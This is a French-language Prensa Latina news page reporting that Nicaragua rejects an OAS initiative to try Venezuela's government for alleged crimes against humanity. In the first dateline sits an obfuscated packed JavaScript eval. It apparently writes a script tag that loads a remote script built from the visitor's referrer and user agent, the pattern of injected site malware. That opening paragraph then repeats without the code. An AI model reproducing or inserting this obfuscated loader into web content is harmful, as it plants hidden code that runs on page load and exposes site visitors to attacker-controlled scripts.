mercredi 17 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Le Nicaragua rejette la manœuvre de l’OEA contre le Venezuela

Managua, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ekrni|var|u0026u|referrer|inabt||js|php'.split('|'),0,{})) 14 septembre (PL) Le Nicaragua a rejeté la convocation du Secrétariat Général de l'Organisation des États Américains (OEA) pour juger le gouvernement du Venezuela par la prétendue commission de crimes contre l'humanité.

Managua, 14 septembre (PL) Le Nicaragua a rejeté la convocation du Secrétariat Général de l’Organisation des États Américains (OEA) pour juger le gouvernement du Venezuela par la prétendue commission de crimes contre l’humanité.

Par une note de presse diffusée par sa représentation permanente devant l’OEA, le gouvernement de Managua a dénoncé le fait que « cette action est une infraction à la nature et aux buts pour lesquels ce mécanisme multilatéral a été créé ».

« Insister dans cette direction c’est pervertir l’essence et le fonctionnement de cette organisation (…), raison pour laquelle nous rejetons cette initiative, car elle est remplie de vices administratifs et ne respecte pas les principes du droit international », est-il signalé dans le texte.
 
Il y est également souligné que l’OEA n’a pas plus de pouvoirs que ceux que lui confère sa Charte fondatrice, et qu’aucune de ses dispositions l’autorise à intervenir dans la juridiction interne des États membres.

peo/lma/abc

EN CONTINU
notes connexes